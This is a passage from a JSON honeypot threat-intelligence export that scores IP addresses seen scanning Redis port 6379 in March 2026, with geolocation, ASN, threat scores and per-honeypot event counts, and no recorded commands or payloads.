        "days_active_30d": 29,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T08:33:34.970000+00:00",
        "last_seen_30d": "2026-03-31T10:59:00.342000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 13
      }
    },
    "146.56.175.64": {
      "attack_count": 64,
      "first_seen": "2026-03-05T01:07:06.000Z",
      "last_seen": "2026-03-30T17:22:32.126Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "South Korea",
      "country_code": "KR",
      "city": "Seoul",
      "asn": 31898,
      "as_org": "Oracle Corporation",
      "threat_score": 46.5,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.5,
        "persistence": 21.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 28,
        "days_active_30d": 26,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T01:07:07+00:00",
        "last_seen_30d": "2026-03-30T17:22:32.126000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 21,
        "Suricata": 7
      }
    },
    "223.76.108.98": {
      "attack_count": 57,
      "first_seen": "2026-03-02T22:52:55.000Z",
      "last_seen": "2026-03-26T17:36:52.093Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Wuhan",
      "asn": 9808,
      "as_org": "China Mobile Communications Group Co., Ltd.",
      "threat_score": 38.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 13.8,
        "persistence": 20.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 24,
        "days_active_30d": 25,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T22:52:55+00:00",
        "last_seen_30d": "2026-03-26T17:36:52.093000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 18,
        "Suricata": 6
      }
    },
    "147.93.178.1": {
      "attack_count": 47,
      "first_seen": "2026-03-04T06:40:17.000Z",
      "last_seen": "2026-03-11T17:23:28.695Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Orangeburg",
      "asn": 40021,
      "as_org": "Contabo Inc.",
      "threat_score": 10.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 13.0,
        "persistence": 6.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 20,
        "days_active_30d": 8,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-04T06:40:18+00:00",
        "last_seen_30d": "2026-03-11T17:23:28.695000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 15,
        "Suricata": 5
      }
    },
    "120.48.151.68": {
      "attack_count": 46,
      "first_seen": "2026-03-08T15:18:49.000Z",
      "last_seen": "2026-03-29T22:31:17.505Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 38365,
      "as_org": "Beijing Baidu Netcom Science and Technology Co., Ltd.",
      "threat_score": 32.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.5,
        "persistence": 18.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 9,
        "days_active_30d": 22,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-08T15:19:50.892000+00:00",
        "last_seen_30d": "2026-03-29T22:31:17.505000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 9
      }
    },
    "182.40.103.253": {
      "attack_count": 41,
      "first_seen": "2026-03-08T02:15:36.000Z",
      "last_seen": "2026-03-29T12:24:05.673Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 136195,
      "as_org": "Qingdao, Shandong Province, P.R.China.",
      "threat_score": 32.1,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.0,
        "persistence": 18.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 22,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-08T02:16:45.562000+00:00",
        "last_seen_30d": "2026-03-29T12:24:05.673000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 8
      }
    },
    "81.70.2.239": {
      "attack_count": 37,
      "first_seen": "2026-03-05T22:29:00.000Z",
      "last_seen": "2026-03-30T16:06:48.805Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 35.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 8.5,
        "persistence": 21.7,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 26,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T22:30:06.788000+00:00",
        "last_seen_30d": "2026-03-30T16:06:48.805000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7
      }
    },
    "111.180.139.42": {
      "attack_count": 34,
      "first_seen": "2026-03-30T20:44:52.000Z",
      "last_seen": "2026-03-30T20:47:07.043Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 148981,
      "as_org": "China Telecom",
      "threat_score": 26.5,
      "threat_level": "low",
      "score_components": {
        "frequency": 14.6,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 29,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-30T20:44:53+00:00",
        "last_seen_30d": "2026-03-30T20:47:07.043000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 28,
        "Suricata": 1
      }
    },
    "111.228.28.79": {
      "attack_count": 34,
      "first_seen": "2026-03-28T06:30:46.000Z",
      "last_seen": "2026-03-28T06:33:06.034Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 141679,
      "as_org": "China Telecom Beijing Tianjin Hebei Big Data Industry Park Branch",
      "threat_score": 24.7,
      "threat_level": "low",
      "score_components": {
        "frequency": 14.6,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 29,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-28T06:30:47+00:00",
        "last_seen_30d": "2026-03-28T06:33:06.034000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 28,
        "Suricata": 1
      }
    },
    "160.119.76.57": {
      "attack_count": 32,
      "first_seen": "2026-03-28T14:41:21.000Z",
      "last_seen": "2026-03-29T03:23:20.176Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Seychelles",
      "country_code": "SC",
      "city": null,
      "asn": 49870,
      "as_org": "Alsycon B.V.",
      "threat_score": 72.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 30.0,
        "persistence": 2.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 998,
        "days_active_30d": 3,
        "ports_targeted_30d": 94,
        "honeypots_triggered_30d": 12,
        "first_seen_30d": "2026-03-27T11:11:56.428000+00:00",
        "last_seen_30d": "2026-03-29T08:31:20.535000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 682,
        "Honeytrap": 216,
        "Dionaea": 33,
        "Miniprint": 16,
        "Cowrie": 15,
        "Redishoneypot": 8,
        "Ciscoasa": 6,
        "ConPot": 6,
        "H0neytr4p": 5,
        "Honeyaml": 5,
        "Tanner": 5,
        "ElasticPot": 1
      }
    },
    "20.235.199.122": {
      "attack_count": 27,
      "first_seen": "2026-03-07T22:10:17.000Z",
      "last_seen": "2026-03-24T18:49:54.059Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "India",
      "country_code": "IN",
      "city": "Pune",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 29.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.8,
        "persistence": 15.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 18,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-07T22:10:17+00:00",
        "last_seen_30d": "2026-03-24T18:49:54.059000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 9,
        "Suricata": 3
      }
    },
    "64.62.156.24": {
      "attack_count": 27,
      "first_seen": "2026-03-11T13:26:44.000Z",
      "last_seen": "2026-03-11T13:28:33.459Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Minneapolis",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 95.5,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.5,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 354,
        "days_active_30d": 30,
        "ports_targeted_30d": 91,
        "honeypots_triggered_30d": 10,
        "first_seen_30d": "2026-03-02T02:07:03.808000+00:00",
        "last_seen_30d": "2026-03-31T14:22:29.577000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 227,
        "Honeytrap": 88,
        "Redishoneypot": 11,
        "Cowrie": 8,
        "H0neytr4p": 8,
        "ConPot": 4,
        "Dionaea": 3,
        "Honeyaml": 3,
        "ElasticPot": 1,
        "Ipphoney": 1
      }
    },
    "64.62.197.137": {
      "attack_count": 27,
      "first_seen": "2026-03-06T12:54:20.000Z",
      "last_seen": "2026-03-06T12:56:05.329Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 94.2,
      "threat_level": "critical",
      "score_components": {
        "frequency": 24.2,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 264,
        "days_active_30d": 30,
        "ports_targeted_30d": 71,
        "honeypots_triggered_30d": 9,
        "first_seen_30d": "2026-03-02T01:23:30+00:00",
        "last_seen_30d": "2026-03-31T02:05:06.280000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 158,
        "Honeytrap": 76,
        "Redishoneypot": 11,
        "H0neytr4p": 8,
        "Cowrie": 5,
        "Dionaea": 2,
        "Tanner": 2,
        "ConPot": 1,
        "Ipphoney": 1
      }
    },
    "184.105.247.252": {
      "attack_count": 26,
      "first_seen": "2026-03-04T13:56:21.000Z",
      "last_seen": "2026-03-04T13:58:08.600Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 94.5,
      "threat_level": "critical",
      "score_components": {
        "frequency": 24.5,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 280,
        "days_active_30d": 30,
        "ports_targeted_30d": 60,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T01:17:34+00:00",
        "last_seen_30d": "2026-03-31T11:54:03.215000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 164,
        "Honeytrap": 85,
        "Redishoneypot": 11,
        "Dionaea": 7,
        "ConPot": 6,
        "Mailoney": 6,
        "Miniprint": 1
      }
    },
    "216.218.206.68": {
      "attack_count": 26,
      "first_seen": "2026-03-27T14:28:50.000Z",
      "last_seen": "2026-03-27T14:30:45.358Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Cazadero",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 96.0,
      "threat_level": "critical",
      "score_components": {
        "frequency": 26.0,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 395,
        "days_active_30d": 30,
        "ports_targeted_30d": 75,
        "honeypots_triggered_30d": 9,
        "first_seen_30d": "2026-03-02T00:18:08+00:00",
        "last_seen_30d": "2026-03-31T03:40:34.997000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 240,
        "Honeytrap": 112,
        "Redishoneypot": 11,
        "H0neytr4p": 10,
        "Miniprint": 8,
        "Dionaea": 7,
        "ElasticPot": 3,
        "ConPot": 2,
        "Cowrie": 2
      }
    },
    "170.64.196.209": {
      "attack_count": 25,
      "first_seen": "2026-03-16T09:22:47.000Z",
      "last_seen": "2026-03-16T09:23:55.967Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Australia",
      "country_code": "AU",
      "city": "Sydney",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 36.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 26.9,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.5
      },
      "reputation_metrics": {
        "total_events_30d": 485,
        "days_active_30d": 1,
        "ports_targeted_30d": 36,
        "honeypots_triggered_30d": 8,
        "first_seen_30d": "2026-03-16T09:22:47+00:00",
        "last_seen_30d": "2026-03-16T09:24:06.979000+00:00",
        "days_since_last_seen": 15
      },
      "honeypot_breakdown_30d": {
        "Suricata": 301,
        "Honeytrap": 135,
        "Cowrie": 18,
        "Dionaea": 9,
        "Redishoneypot": 9,
        "Honeyaml": 7,
        "ElasticPot": 5,
        "Ipphoney": 1
      }
    },
    "40.124.172.38": {
      "attack_count": 23,
      "first_seen": "2026-03-16T04:01:25.000Z",
      "last_seen": "2026-03-16T04:04:10.589Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "San Antonio",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 45.1,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.6,
        "persistence": 11.7,
        "diversity": 8,
        "spread": 15,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 23,
        "days_active_30d": 14,
        "ports_targeted_30d": 4,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-16T04:02:31.051000+00:00",
        "last_seen_30d": "2026-03-29T22:57:15.265000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 12,
        "Honeytrap": 6,
        "Redishoneypot": 5
      }
    },
    "40.76.116.231": {
      "attack_count": 23,
      "first_seen": "2026-03-22T19:05:28.000Z",
      "last_seen": "2026-03-22T19:09:00.617Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 53.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.8,
        "persistence": 15.8,
        "diversity": 12,
        "spread": 15,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 30,
        "days_active_30d": 19,
        "ports_targeted_30d": 6,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-11T09:51:05.982000+00:00",
        "last_seen_30d": "2026-03-29T19:48:49.948000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 18,
        "Honeytrap": 7,
        "Redishoneypot": 5
      }
    },
    "162.142.125.144": {
      "attack_count": 21,
      "first_seen": "2026-03-19T19:27:42.000Z",
      "last_seen": "2026-03-23T19:32:15.348Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 43.4,
      "threat_level": "medium",
      "score_components": {
        "frequency": 30,
        "persistence": 4.2,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 1049,
        "days_active_30d": 5,
        "ports_targeted_30d": 728,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-19T14:15:48.417000+00:00",
        "last_seen_30d": "2026-03-23T22:23:09.655000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1049
      }
    },
    "67.205.172.104": {
      "attack_count": 21,
      "first_seen": "2026-03-10T02:59:02.000Z",
      "last_seen": "2026-03-10T03:00:10.079Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 6.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 10.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 10,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-10T02:59:02+00:00",
        "last_seen_30d": "2026-03-10T03:00:10.079000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 8,
        "Suricata": 2
      }
    },
    "100.28.153.226": {
      "attack_count": 20,
      "first_seen": "2026-03-12T02:39:17.000Z",
      "last_seen": "2026-03-16T02:52:01.778Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 75.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 25.7,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 371,
        "days_active_30d": 30,
        "ports_targeted_30d": 164,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:04:51.698000+00:00",
        "last_seen_30d": "2026-03-31T19:10:47.314000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 371
      }
    },
    "137.184.201.88": {
      "attack_count": 20,
      "first_seen": "2026-03-11T17:20:10.000Z",
      "last_seen": "2026-03-11T17:30:21.737Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 24.1,
      "threat_level": "low",
      "score_components": {
        "frequency": 23.2,
        "persistence": 2.5,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.37
      },
      "reputation_metrics": {
        "total_events_30d": 207,
        "days_active_30d": 3,
        "ports_targeted_30d": 11,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-10T11:59:59.416000+00:00",
        "last_seen_30d": "2026-03-12T00:25:33.235000+00:00",
        "days_since_last_seen": 19
      },
      "honeypot_breakdown_30d": {
        "Suricata": 131,
        "Honeytrap": 67,
        "Redishoneypot": 8,
        "Dionaea": 1
      }
    },
    "181.115.186.122": {
      "attack_count": 19,
      "first_seen": "2026-03-20T15:26:37.000Z",
      "last_seen": "2026-03-27T15:54:16.981Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Bolivia",
      "country_code": "BO",
      "city": "La Paz",
      "asn": 6568,
      "as_org": "EMPRESA NACIONAL DE TELECOMUNICACIONES SOCIEDAD ANONIMA",
      "threat_score": 70.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.0,
        "persistence": 8.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 160,
        "days_active_30d": 10,
        "ports_targeted_30d": 10,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-20T15:27:47.539000+00:00",
        "last_seen_30d": "2026-03-29T06:42:07.326000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 132,
        "ElasticPot": 16,
        "Dionaea": 4,
        "Honeytrap": 4,
        "Redishoneypot": 3,
        "Honeyaml": 1
      }
    },
    "138.68.134.113": {
      "attack_count": 18,
      "first_seen": "2026-03-27T05:51:23.000Z",
      "last_seen": "2026-03-27T05:52:29.060Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Kingdom",
      "country_code": "GB",
      "city": "Slough",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 74.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 10.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 107878,
        "days_active_30d": 13,
        "ports_targeted_30d": 65125,
        "honeypots_triggered_30d": 19,
        "first_seen_30d": "2026-03-15T19:40:47+00:00",
        "last_seen_30d": "2026-03-27T06:01:56.401000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 96739,
        "Honeytrap": 11075,
        "Dionaea": 12,
        "ConPot": 10,
        "Cowrie": 10,
        "Miniprint": 8,
        "Mailoney": 6,
        "Redishoneypot": 3,
        "Adbhoney": 2,
        "Ciscoasa": 2,
        "Dicompot": 2,
        "CitrixHoneypot": 1,
        "ElasticPot": 1,
        "H0neytr4p": 1,
        "Honeyaml": 1,
        "Ipphoney": 1,
        "Medpot": 1,
        "Tanner": 1
      }
    },
    "173.231.231.12": {
      "attack_count": 18,
      "first_seen": "2026-03-17T03:16:53.000Z",
      "last_seen": "2026-03-18T05:35:47.605Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 22611,
      "as_org": "InMotion Hosting, Inc.",
      "threat_score": 12.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.0,
        "persistence": 1.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 2,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-17T03:16:53+00:00",
        "last_seen_30d": "2026-03-18T05:35:47.605000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "180.232.31.146": {
      "attack_count": 18,
      "first_seen": "2026-03-08T09:21:42.000Z",
      "last_seen": "2026-03-22T17:50:57.477Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Philippines",
      "country_code": "PH",
      "city": "Paranaque City",
      "asn": 9658,
      "as_org": "Eastern Telecoms Phils., Inc.",
      "threat_score": 31.5,
      "threat_level": "low",
      "score_components": {
        "frequency": 11.5,
        "persistence": 12.5,
        "diversity": 6,
        "spread": 15,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 14,
        "days_active_30d": 15,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-08T09:21:42+00:00",
        "last_seen_30d": "2026-03-22T17:50:57.477000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7,
        "Redishoneypot": 6,
        "Honeytrap": 1
      }
    },
    "137.184.23.12": {
      "attack_count": 17,
      "first_seen": "2026-03-17T06:22:06.000Z",
      "last_seen": "2026-03-17T06:32:22.463Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 11.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.53
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-17T06:22:07+00:00",
        "last_seen_30d": "2026-03-17T06:32:22.463000+00:00",
        "days_since_last_seen": 14
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 5,
        "Suricata": 2
      }
    },
    "185.242.226.92": {
      "attack_count": 17,
      "first_seen": "2026-03-03T18:41:27.000Z",
      "last_seen": "2026-03-03T18:43:03.029Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 202425,
      "as_org": "IP Volume inc",
      "threat_score": 31.7,
      "threat_level": "low",
      "score_components": {
        "frequency": 16.1,
        "persistence": 10.8,
        "diversity": 16,
        "spread": 25,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 41,
        "days_active_30d": 13,
        "ports_targeted_30d": 8,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-03T18:41:52+00:00",
        "last_seen_30d": "2026-03-15T13:00:23.397000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Suricata": 26,
        "Honeytrap": 5,
        "Dionaea": 4,
        "ElasticPot": 3,
        "Redishoneypot": 3
      }
    },
    "68.183.120.205": {
      "attack_count": 17,
      "first_seen": "2026-03-21T20:22:57.000Z",
      "last_seen": "2026-03-21T20:24:09.104Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 14.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-21T20:22:57+00:00",
        "last_seen_30d": "2026-03-21T20:24:09.104000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 5,
        "Suricata": 2
      }
    },
    "101.206.108.14": {
      "attack_count": 16,
      "first_seen": "2026-03-13T20:08:12.000Z",
      "last_seen": "2026-03-31T04:56:40.846Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 55.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 15.4,
        "persistence": 24.2,
        "diversity": 6,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 35,
        "days_active_30d": 29,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T20:27:07+00:00",
        "last_seen_30d": "2026-03-31T04:56:40.846000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 29,
        "Honeytrap": 6
      }
    },
    "107.189.22.183": {
